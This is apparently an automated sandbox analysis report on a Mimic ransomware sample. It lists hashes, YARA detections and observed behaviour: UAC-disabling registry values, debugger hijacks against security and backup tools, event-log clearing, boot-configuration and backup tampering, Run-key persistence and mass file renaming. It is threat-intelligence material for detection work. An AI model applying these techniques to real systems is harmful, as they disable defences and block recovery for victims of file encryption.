Analysis
-
max time kernel
590s -
max time network
599s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
10-01-2024 12:17
Static task
static1
Behavioral task
behavioral1
Sample
a8759b39cecf17631e9d4952aecd32ce233e01d08841178e7ef81f3afdd8e455.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
a8759b39cecf17631e9d4952aecd32ce233e01d08841178e7ef81f3afdd8e455.exe
Resource
win10v2004-20231215-en
General
-
Target
a8759b39cecf17631e9d4952aecd32ce233e01d08841178e7ef81f3afdd8e455.exe
-
Size
3.2MB
-
MD5
6d44f8f3c1608e5958b40f9c6d7b6718
-
SHA1
9203ad3b6ffb7732591ef560965566555bce9d82
-
SHA256
a8759b39cecf17631e9d4952aecd32ce233e01d08841178e7ef81f3afdd8e455
-
SHA512
656eb44b563705e1045b6a881b4f8a462ecf3bb8b2421cb18dfa21421629f7af92fe4b72736edfe3fea2ea13bef84f5faab5a78b8ef2b4f656a9055d0c4a22bd
-
SSDEEP
98304:wgwRevguPPFpugyxQkvA51nFbk+kUwWlGroD+1f:wgtv7ov5vqbk++AGkD+1f
Malware Config
Signatures
-
Detects Mimic ransomware 8 IoCs
resource yara_rule behavioral2/files/0x0007000000023218-37.dat family_mimic behavioral2/files/0x0007000000023218-38.dat family_mimic behavioral2/files/0x0008000000023142-66.dat family_mimic behavioral2/files/0x0008000000023142-65.dat family_mimic behavioral2/files/0x0008000000023142-71.dat family_mimic behavioral2/files/0x0008000000023142-100.dat family_mimic behavioral2/files/0x0008000000023142-98.dat family_mimic behavioral2/files/0x0008000000023142-97.dat family_mimic -
Mimic
Ransomware family was first exploited in the wild in 2022.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" YOURDATA.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 5612 wevtutil.exe 6600 wevtutil.exe 1536 wevtutil.exe -
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 5736 bcdedit.exe 5796 bcdedit.exe -
Renames multiple (4495) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5816 wbadmin.exe -
pid Process 3024 wbadmin.exe -
Sets file execution options in registry 2 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SimplyConnectionManager.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqlwriter.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SearchProtocolHost.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mysqld.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RAgui.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mspub.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tbirdconfig.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logoff.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\beserver.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isqlplussvc.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tomcat6.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsnapvss.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vxmon.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SearchProtocolHost.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fdlauncher.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QBIDPService.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wxServerView.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msexchangesa.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iisadmin.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ocomm.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sql.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mysqld.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RaccineElevatedCfg.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Sysmon64.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tv_x64.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fdhost.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fdhost.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qbupdate.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqbcoreservice.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqlmangr.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TeamViewer_Service.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dbsnmp.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\encsvc.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsa_service.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RaccineElevatedCfg.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RaccineSettings.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mydesktopservice.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Raccine.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TeamViewer.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsDtSrvr.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mydesktopservice.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Raccine_x86.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wxServer.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msexchangeis.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EnterpriseClient.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QBDBMgrN.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qbupdate.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CompatTelRunner.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\node.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\python.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VeeamDeploymentSvc.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\raw_agent_svc.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SimplyConnectionManager.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Creative Cloud.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oracle.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqlwriter.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tasklist.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\axlbridge.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ocssd.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dbeng50.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fbguard.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe -
Executes dropped EXE 12 IoCs
pid Process 2808 7za.exe 4208 7za.exe 3700 powercfg.exe 2900 YOURDATA.exe 316 DC.exe 1744 YOURDATA.exe 2160 YOURDATA.exe 2580 YOURDATA.exe 3860 Everything.exe 4468 Everything.exe 3696 xdel.exe 3672 xdel.exe -
Loads dropped DLL 5 IoCs
pid Process 3700 powercfg.exe 2900 YOURDATA.exe 1744 YOURDATA.exe 2160 YOURDATA.exe 2580 YOURDATA.exe -
Modifies system executable filetype association 2 TTPs 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command powercfg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*" powercfg.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\exefile\shell\open powercfg.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\exefile\shell\open\command YOURDATA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\exefile\shell\open\command\ = "\"%1\" %*" YOURDATA.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\exefile\shell\open\command powercfg.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\exefile\shell powercfg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\exefile\shell\open\command\ = "\"%1\" %*" powercfg.exe Key created \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*" YOURDATA.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YOURDATA = "\"C:\\Users\\Admin\\AppData\\Local\\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\\YOURDATA.exe\" " powercfg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YOURDATA.exe = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\----Read-Me-----.txt\"" YOURDATA.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" YOURDATA.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: Everything.exe File opened (read-only) \??\J: Everything.exe File opened (read-only) \??\W: Everything.exe File opened (read-only) \??\G: Everything.exe File opened (read-only) \??\A: Everything.exe File opened (read-only) \??\Z: Everything.exe File opened (read-only) \??\K: Everything.exe File opened (read-only) \??\M: Everything.exe File opened (read-only) \??\O: Everything.exe File opened (read-only) \??\Y: Everything.exe File opened (read-only) \??\X: Everything.exe File opened (read-only) \??\Q: Everything.exe File opened (read-only) \??\S: Everything.exe File opened (read-only) \??\S: Everything.exe File opened (read-only) \??\T: Everything.exe File opened (read-only) \??\E: Everything.exe File opened (read-only) \??\V: Everything.exe File opened (read-only) \??\W: Everything.exe File opened (read-only) \??\E: Everything.exe File opened (read-only) \??\K: Everything.exe File opened (read-only) \??\L: Everything.exe File opened (read-only) \??\M: Everything.exe File opened (read-only) \??\P: Everything.exe File opened (read-only) \??\V: Everything.exe File opened (read-only) \??\A: Everything.exe File opened (read-only) \??\H: Everything.exe File opened (read-only) \??\Z: Everything.exe File opened (read-only) \??\B: Everything.exe File opened (read-only) \??\Y: Everything.exe File opened (read-only) \??\L: Everything.exe File opened (read-only) \??\N: Everything.exe File opened (read-only) \??\X: Everything.exe File opened (read-only) \??\N: Everything.exe File opened (read-only) \??\O: Everything.exe File opened (read-only) \??\I: Everything.exe File opened (read-only) \??\T: Everything.exe File opened (read-only) \??\U: Everything.exe File opened (read-only) \??\G: Everything.exe File opened (read-only) \??\H: Everything.exe File opened (read-only) \??\Q: Everything.exe File opened (read-only) \??\R: Everything.exe File opened (read-only) \??\U: Everything.exe File opened (read-only) \??\B: Everything.exe File opened (read-only) \??\J: Everything.exe File opened (read-only) \??\P: Everything.exe File opened (read-only) \??\R: Everything.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STRTEDGE\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription3-ul-oob.xrm-ms.getmydata@list.ru.3000USDAA YOURDATA.exe File opened for modification C:\Program Files\7-Zip\[email protected] YOURDATA.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Grace-ul-oob.xrm-ms.getmydata@list.ru.3000USDAA YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected]@list.ru.3000USDAA YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected]@list.ru.3000USDAA YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000006\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_Subscription-ul-oob.xrm-ms.getmydata@list.ru.3000USDAA YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Common Files\DESIGNER\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\[email protected] YOURDATA.exe File opened for modification C:\Program Files\7-Zip\Lang\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\[email protected] YOURDATA.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_wob.png.getmydata@list.ru.3000USDAA YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms.getmydata@list.ru.3000USDAA YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdXC2RVL_KMS_ClientC2R-ppd.xrm-ms.getmydata@list.ru.3000USDAA YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]@list.ru.3000USDAA YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]@list.ru.3000USDAA YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\[email protected] YOURDATA.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Modifies registry class 19 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\exefile\shell\open\command powercfg.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\exefile\shell\open powercfg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\----Read-Me-----.txt\"" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*" powercfg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*" YOURDATA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\exefile\shell\open\command\ = "\"%1\" %*" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.3000USDAA\ = "mimicfile" YOURDATA.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\exefile\shell powercfg.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\exefile\shell\open\command YOURDATA.exe Key created \REGISTRY\MACHINE\Software\Classes\mimicfile\shell\open\command YOURDATA.exe Key created \REGISTRY\MACHINE\Software\Classes\.3000USDAA YOURDATA.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\exefile powercfg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\exefile\shell\open\command\ = "\"%1\" %*" powercfg.exe Key created \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell\open YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell\open\command YOURDATA.exe Key created 